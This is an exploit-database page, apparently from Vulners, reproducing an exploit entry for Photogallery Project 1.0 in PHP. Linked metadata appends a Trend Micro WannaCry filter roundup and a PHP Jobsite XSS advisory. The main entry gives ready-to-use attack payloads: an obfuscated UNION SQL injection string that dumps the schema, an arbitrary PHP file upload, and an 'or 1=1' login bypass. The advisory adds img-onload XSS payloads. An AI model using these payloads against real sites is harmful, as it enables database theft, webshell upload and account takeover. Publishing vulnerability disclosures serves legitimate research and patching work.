Search...

Photogallery Project 1.0 - SQL Injection Vulnerability

2017-08-18T00:00:00

ID 1337DAY-ID-28304
Type zdt
Reporter Ihsan Sencan
Modified 2017-08-18T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # # # # #
# Exploit Title: Photogallery Project 1.0 - Multiple Vulnerabilities
# Dork: N/A
# Date: 17.08.2017
# Vendor Homepage : http://surajkumar.in/
# Software Link: http://surajkumar.in/product/photogallery-project-in-php/
# Demo: http://surajkumar.in/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands...
# The vulnerability allows an attacker to access the normal member and administration panel...
# The vulnerability allows an ordinary member upload arbitrary file...
# 
# Vulnerable Source:
# # # # #
# &lt;?php
# ....1
# $pageContent=get_pages($_GET['page_id']);
# ..
# function get_pages($pageid){
# $res=array();
# global $connection;
# if($pageid==0){
# $fetchPages=mysqli_query($connection,"SELECT * FROM ".PAGE);
# }else{
# $fetchPages=mysqli_query($connection,"SELECT * FROM ".PAGE." WHERE id='$pageid'");
# 
# ....2
# $userData=get_user_by_id($_SESSION['userID']);
# if(isset($_POST['user_image'])){
# $userImage=$_FILES['userImg']['name'];
# $userTmpImage=$_FILES['userImg']['tmp_name'];
# if(!file_exists('profile_pics'.'/'.$userImage)){
# $img=$userImage;
# }else{
# $rand=rand(1,1000);
# $img=$rand.'_'.$userImage;
# }
# if(move_uploaded_file($userTmpImage,'profile_pics'.'/'.$img)){
# $updateImg=update_profile_img($img,$userData['userData']['id']);
# if($updateImg['bool']==true){
# 
# ....3
# if(isset($_POST['_login'])){
# $data=array();
# $data['email']=$_POST['_email'];
# $data['password']=$_POST['_pass'];
# $loginRes=user_login($data);
# if($loginRes['bool']==true){
# ....
# ?&gt;
# # # # #
#   
# Proof of Concept:
# 
# 1:
# http://localhost/[PATH]/page.php?page_id=[SQL]
# -1'+/*!22222UnIoN*/(/*!22222SeLeCT*/++0x283129,0x283229,0x283329,(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),/*!11111Concat*/(0x3c2f6469763e,LPAD(@running_number:[email protected]_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),0x00),lpad(@z:[email protected]%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),0x283529)+--+-&title=&lt;h1&gt;%49%68%73%61%6e%20%53%65%6e%63%61%6e&lt;/h1&gt;
# 
# 2:
# http://localhost/[PATH]/edit_profile_img.php?profile_id=[ID]
# http://localhost/[PATH]/profile_pics/[FILE].php
# 
# 3:
# http://localhost/[PATH]/login.php
# http://localhost/[PATH]/admin
# User: 'or 1=1 or ''=' Pass: 'or 1=1 or ''='
# 
# Etc...
# # # # #

#  0day.today [2018-04-10]  #

JSON Vulners Source

Initial Source

{"sourceData": "# # # # #\r\n# Exploit Title: Photogallery Project 1.0 - Multiple Vulnerabilities\r\n# Dork: N/A\r\n# Date: 17.08.2017\r\n# Vendor Homepage : http://surajkumar.in/\r\n# Software Link: http://surajkumar.in/product/photogallery-project-in-php/\r\n# Demo: http://surajkumar.in/\r\n# Version: 1.0\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: N/A\r\n# # # # #\r\n# Exploit Author: Ihsan Sencan\r\n# Author Web: http://ihsan.net\r\n# Author Social: @ihsansencan\r\n# # # # #\r\n# Description:\r\n# The vulnerability allows an attacker to inject sql commands...\r\n# The vulnerability allows an attacker to access the normal member and administration panel...\r\n# The vulnerability allows an ordinary member upload arbitrary file...\r\n# \r\n# Vulnerable Source:\r\n# # # # #\r\n# <?php\r\n# ....1\r\n# $pageContent=get_pages($_GET['page_id']);\r\n# ..\r\n# function get_pages($pageid){\r\n# $res=array();\r\n# global $connection;\r\n# if($pageid==0){\r\n# $fetchPages=mysqli_query($connection,\"SELECT * FROM \".PAGE);\r\n# }else{\r\n# $fetchPages=mysqli_query($connection,\"SELECT * FROM \".PAGE.\" WHERE id='$pageid'\");\r\n# \r\n# ....2\r\n# $userData=get_user_by_id($_SESSION['userID']);\r\n# if(isset($_POST['user_image'])){\r\n# $userImage=$_FILES['userImg']['name'];\r\n# $userTmpImage=$_FILES['userImg']['tmp_name'];\r\n# if(!file_exists('profile_pics'.'/'.$userImage)){\r\n# $img=$userImage;\r\n# }else{\r\n# $rand=rand(1,1000);\r\n# $img=$rand.'_'.$userImage;\r\n# }\r\n# if(move_uploaded_file($userTmpImage,'profile_pics'.'/'.$img)){\r\n# $updateImg=update_profile_img($img,$userData['userData']['id']);\r\n# if($updateImg['bool']==true){\r\n# \r\n# ....3\r\n# if(isset($_POST['_login'])){\r\n# $data=array();\r\n# $data['email']=$_POST['_email'];\r\n# $data['password']=$_POST['_pass'];\r\n# $loginRes=user_login($data);\r\n# if($loginRes['bool']==true){\r\n# ....\r\n# ?>\r\n# # # # #\r\n# \r\n# Proof of Concept:\r\n# \r\n# 1:\r\n# http://localhost/[PATH]/page.php?page_id=[SQL]\r\n# -1'+/*!22222UnIoN*/(/*!22222SeLeCT*/++0x283129,0x283229,0x283329,(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),/*!11111Concat*/(0x3c2f6469763e,LPAD(@running_number:[email\u00a0protected]_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),0x00),lpad(@z:[email\u00a0protected]%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),0x283529)+--+-&title=<h1>%49%68%73%61%6e%20%53%65%6e%63%61%6e</h1>\r\n# \r\n# 2:\r\n# http://localhost/[PATH]/edit_profile_img.php?profile_id=[ID]\r\n# http://localhost/[PATH]/profile_pics/[FILE].php\r\n# \r\n# 3:\r\n# http://localhost/[PATH]/login.php\r\n# http://localhost/[PATH]/admin\r\n# User: 'or 1=1 or ''=' Pass: 'or 1=1 or ''='\r\n# \r\n# Etc...\r\n# # # # #\n\n# 0day.today [2018-04-10] #", "history": [], "description": "Exploit for php platform in category web applications", "sourceHref": "https://0day.today/exploit/28304", "reporter": "Ihsan Sencan", "href": "https://0day.today/exploit/description/28304", "type": "zdt", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc"}, {"key": "href", "hash": "6fa6cfc1bf5c553cda0cd28676c59722"}, {"key": "modified", "hash": "310fb85ea84ab29a26dde8d8a99ff6b0"}, {"key": "published", "hash": "310fb85ea84ab29a26dde8d8a99ff6b0"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "8f9da6443571f75195f401f82e60b810"}, {"key": "sourceData", "hash": "8f783344e6168d6911258fdbc17cb7df"}, {"key": "sourceHref", "hash": "5a7a6129f7aeb8193db3aa343dadf00a"}, {"key": "title", "hash": "de24776520fa4d1b50ae01fd8654d98f"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "viewCount": 3, "references": [], "lastseen": "2018-04-10T04:23:04", "published": "2017-08-18T00:00:00", "objectVersion": "1.3", "cvelist": [], "id": "1337DAY-ID-28304", "hash": "177924c5029ab26ffd43db7ba696a95aa45e756caec6344149cef2c80ec742c5", "modified": "2017-08-18T00:00:00", "title": "Photogallery Project 1.0 - SQL Injection Vulnerability", "edition": 1, "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 0.4, "vector": "NONE", "modified": "2018-04-10T04:23:04"}, "dependencies": {"references": [{"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:28304"]}], "modified": "2018-04-10T04:23:04"}, "vulnersScore": 0.4}}

{"trendmicroblog": [{"lastseen": "2017-05-19T12:47:34", "bulletinFamily": "blog", "description": "![](http://blog.trendmicro.com/wp-content/uploads/2016/04/TP-WeeklyBlog-300x205-300x205.jpg)\n\n\u201cAre you crying? ARE YOU CRYING? There\u2019s no crying! THERE\u2019S NO CRYING IN BASEBALL!\u201d Those famous words from Jimmy Dugan (portrayed by Tom Hanks) in the 1992 movie _A League of their Own_, ring true in the world of baseball. Unfortunately, in the cyber security world, there has been some crying this week with the outbreak of WannaCry, which is being dubbed the biggest global ransomware attack to date. WannaCry is taking advantage of a recently disclosed Microsoft vulnerability ([MS17-010 \u2013 \u201cEternalBlue\u201d](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)) associated with the Shadow Brokers tools release, and news outlets are reporting that as many as 300,000 computers in 150 countries have been infected with the malware.\n\nFor customers using TippingPoint solutions, we have identified the following Digital Vaccine\u00ae (DV) filters that should help you protect against the exploits listed in the table below:\n\n**CVE #** | **Digital Vaccine Filter #** | **Category** | **Comments** \n---|---|---|--- \nCVE-2017-0143 | 27433 | Exploit | SMB: Server MID Type Confusion Vulnerability \nCVE-2017-0144 | 27928 | Vulnerabilities | SMB: Remote Code Execution Vulnerability (EternalBlue) \nCVE-2017-0145 | 27711 | Exploit | SMB: Server SMBv1 Buffer Overflow Vulnerability \nCVE-2017-0146 | 27928, 27929 | Vulnerabilities | SMB: Remote Code Execution Vulnerabilities (EternalChampion)\n\n \n\nSMB: Remote Code Execution Vulnerability (EternalBlue) \nCVE-2017-0147 | 27929, 27937 | Vulnerabilities | SMB: Remote Code Execution Vulnerability (EternalBlue)\n\n \n\nSMB: NT_TRANSACT_RENAME Information Disclosure Vulnerability (EternalSynergy) \n| 2176 | Security Policy | SMB: Null Session SetUp \n| 11403 | Security Policy | SMB: Suspicious SMB Fragmentation \n| 27935 | Exploit | SMB: DoublePulsar Backdoor \n| 5614 | Exploit | SMB: Malicious SMB Probe/Attack \n| 30623 | Virus (ThreatDV) | TLS: Suspicious SSL Certificate (DGA) \n \n \n\nIn addition to the DV coverage already provided by TippingPoint, customers who subscribe to our ThreatDV service received additional coverage for the WannaCry/WCRY ransomware vulnerability prior to the usual ThreatDV weekly distribution time. The following filters can be used to prevent the download of the binary files which are known to infect target machines with the ransomware:\n\n| \n\n * 28304: TCP: Ransom_WCRY.I Download Attempt (Specific)\n * 28305: TCP: Ransom_WCRY.I Download Attempt (Generic) \n---|--- \n| \n \nFor further information related to Trend Micro\u2019s response to WannaCry and our recommendations as a whole, please visit <https://success.trendmicro.com/solution/1117391>.\n\nFor information on indicators showing interception or blocking of WannaCry, please visit <https://success.trendmicro.com/solution/1117402-indicators-showing-interception-blocking-of-wcry-wannacry-ransomware>.\n\n**While Everyone was Freaking Out with WannaCry\u2026**\n\nApple had a doozy of a month with their release of [seven updates](<https://support.apple.com/en-us/HT201222>) addressing 66 unique CVEs in macOS, iOS, watchOS, tvOS, iTunes for Windows, Safari, and iCloud for Windows. 35 percent of the CVEs were submitted to Apple via our Zero Day Initiative (ZDI) bug bounty program, with a number of them initially disclosed during our Pwn2Own contest held earlier this year.\n\nFor more information on these vulnerabilities, check out the ZDI blog here: <https://www.zerodayinitiative.com/blog/2017/5/15/the-may-2017-apple-security-update-review>.\n\n**Adobe Security Updates**\n\nThis week\u2019s Digital Vaccine (DV) package includes coverage for Adobe updates released on or before May 16, 2017. The following table maps Digital Vaccine filters to the Adobe updates. You can get more detailed information on this month\u2019s security updates from Dustin Childs\u2019 [May 2017 Security Update Review](<https://www.zerodayinitiative.com/blog/2017/5/5/the-may-2017-security-update-review>):\n\n**Bulletin #** | **CVE #** | **Digital Vaccine Filter #** \n---|---|--- \nAPSB17-15 | CVE-2017-3068 | 28215 \nAPSB17-15 | CVE-2017-3069 | 28222 \nAPSB17-15 | CVE-2017-3070 | 28224 \nAPSB17-15 | CVE-2017-3071 | 28225 \nAPSB17-15 | CVE-2017-3072 | 28217 \nAPSB17-15 | CVE-2017-3073 | 27830 \nAPSB17-15 | CVE-2017-3074 | 27831 \n \n \n\n**Zero-Day Filters**\n\nThere are 12 new zero-day filters covering six vendors in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website.\n\n**_Adobe (2)_**\n\n| \n\n * 28216: ZDI-CAN-4568: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 28218: ZDI-CAN-4562: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)**_ _** \n---|--- \n| \n \n**_Apple (1)_**\n\n| \n\n * 28288: ZDI-CAN-4711: Zero Day Initiative Vulnerability (Apple Safari)**_ _** \n---|--- \n| \n \n**_Dell (1)_**\n\n| \n\n * 28230: ZDI-CAN-4754: Zero Day Initiative Vulnerability (Dell EMC VNX Monitoring and Reporting)**_ _** \n---|--- \n| \n \n**_Hewlett Packard Enterprise (2)_**\n\n| \n\n * 28211: ZDI-CAN-4524,4563: Zero Day Initiative Vulnerability (HPE Operations Orchestration)\n * 28231: ZDI-CAN-4758: Zero Day Initiative Vulnerability (Hewlett Packard Enterprise Intelligent Management)**_ _** \n---|--- \n| \n \n**_Microsoft (3)_**\n\n| \n\n * 28220: ZDI-CAN-4700: Zero Day Initiative Vulnerability (Microsoft Windows)\n * 28226: ZDI-CAN-4708: Zero Day Initiative Vulnerability (Microsoft Windows)\n * 28227: ZDI-CAN-4713: Zero Day Initiative Vulnerability (Microsoft Windows)**_ _** \n---|--- \n| \n \n**_Trend Micro (3)_**\n\n| \n\n * 28118: HTTPS: Trend Micro SafeSync for Enterprise deviceTool.pm get_nic_device SQL Injection (ZDI-17-125)\n * 28228: ZDI-CAN-4744-4745: Zero Day Initiative Vulnerability (Trend Micro InterScan Messaging Security)\n * 28286: ZDI-CAN-4778: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise)**_ _** \n---|--- \n| \n \n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-may-8-2017/>).", "modified": "2017-05-19T12:00:15", "published": "2017-05-19T12:00:15", "id": "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "href": "http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-may-15-2017/", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of May 15, 2017", "type": "trendmicroblog", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:45", "bulletinFamily": "software", "description": "Title:\r\n======\r\nPHP Jobsite v1.36 - Cross Site Scripting Vulnerabilities\r\n\r\n\r\nDate:\r\n=====\r\n2012-06-17\r\n\r\n\r\nReferences:\r\n===========\r\n http://www.vulnerability-lab.com/get_content.php?id=616\r\n\r\n\r\nVL-ID:\r\n=====\r\n616\r\n\r\n\r\nCommon Vulnerability Scoring System:\r\n====================================\r\n2.3\r\n\r\n\r\nIntroduction:\r\n=============\r\nPHP-Jobsite v1.36 Content Management System. Recruitment software made Easy. \r\n\r\nPHP-Jobsite - Price US - $299\r\n\r\nSoftware Overview:\r\n- Run your own job software website or integrated into your corporate site\r\n- control the software from everywhere you are using a browser and internet connection use multilingual \r\noptions to display the language of your clients/users with some HTML and CSS knowledge you can change the \r\ntemplate and have unique look and feel for clients/users\r\n- Planning/Membership options - create plans for employer recruitment (jobs to post, featured jobs to post, \r\nresumes to contact), create free plans for limited periods or allow unlimited access (free site)\r\n- Ecommerce - process Credit Card payments automatically with integrated payment gateways (Paypal, 2checkout, \r\nauthorize.net, worldpay...etc. display your jobs on other sites with Advanced Cross Networking - RSS Feed, js or iframe\r\n\r\n(Copy of the Vendor Homepage: http://www.scriptdemo.com/details/phpjobsite )\r\n\r\n\r\nAbstract:\r\n=========\r\nThe Vulnerability Laboratory Research Team discovered multiple Cross Site Scripting Vulnerabilities in the PHP Jobsite v1.36 Script.\r\n\r\n\r\nReport-Timeline:\r\n================\r\n2012-06-17: Public or Non-Public Disclosure\r\n\r\n\r\nStatus:\r\n========\r\nPublished\r\n\r\n\r\nExploitation-Technique:\r\n=======================\r\nRemote\r\n\r\n\r\nSeverity:\r\n=========\r\nMedium\r\n\r\n\r\nDetails:\r\n========\r\nMultiple non persistent cross site scripting vulnerabilities are detected in the PHP Recruitment software Jobsite v1.36.\r\nThe vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with high required \r\nuser inter action or local low privileged user account. The vulnerabilities are located in the Login and Change Skin module \r\nwith the bound vulnerable ref & sk parameters.Successful exploitation can result in account steal, phishing & client-side content \r\nrequest manipulation.\r\n\r\n\r\nVulnerable Module(s): \r\n [+] Login\r\n [+] Change Skin\r\n\r\nVulnerable Paramater(s): \r\n [+] ref\r\n [+] sk\r\n\r\n\r\nProof of Concept:\r\n=================\r\nThe vulnerabilities can be exploited by remote attackers without privileged user account & with medium or high\r\nrequired user inter action. For demonstration or reproduce ...\r\n\r\n\r\n[*] http://127.0.0.1:8080/script/error_login.php?auth_sess=b315a743d9db4abd26d7b060b57fb082&ref=[CROSS SITE SCRIPTING]\r\n[*] http://127.0.0.1:8080/script/index.php??sk=[CROSS SITE SCRIPTING]\r\n\r\n\r\n[*] \r\nhttp://127.0.0.1:8080/php-jobsite/demo/error_login.php?auth_sess=b315a743d9db4abd26d7b060b57fb082&ref="><img \r\nsrc=http://127.0.0.1:8080/images/200911/11/i8du12ievi9fh1a9rm-owned-headonfire.jpg onload=alert("VL"); />\r\n\r\n[*] \r\nhttp://127.0.0.1:8080/php-jobsite/demo/?sk="><img src=http://www.izipik.com/images/200911/11/i8du12ievi9fh1a9rm-\r\nowned-headonfire.jpg onload=alert("VL"); />\r\n\r\n\r\nRisk:\r\n=====\r\nThe security risk of the cross site scripting vulnerabilities are estiamted as medium(-).\r\n\r\n\r\nCredits:\r\n========\r\nVulnerability Laboratory [Research Team] - Chokri Ben Achour (meister@vulnerability-lab.com) \r\n\r\n\r\nDisclaimer:\r\n===========\r\nThe information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, \r\neither expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-\r\nLab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business \r\nprofits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some \r\nstates do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation \r\nmay not apply. \r\n\r\nDomains: www.vulnerability-lab.com - www.vuln-lab.com\r\nContact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com\r\nSection: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com\r\nSocial: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab\r\n\r\nAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. \r\nPermission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other \r\nmedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and \r\nother information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), \r\nmodify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.\r\n\r\n Copyright \u00a9 2012 Vulnerability-Lab\r\n\r\n\r\n\r\n-- \r\nVULNERABILITY RESEARCH LABORATORY TEAM\r\nWebsite: www.vulnerability-lab.com\r\nMail: research@vulnerability-lab.com\r\n\r\n", "modified": "2012-07-16T00:00:00", "published": "2012-07-16T00:00:00", "id": "SECURITYVULNS:DOC:28304", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28304", "title": "PHP Jobsite v1.36 - Cross Site Scripting Vulnerabilities", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}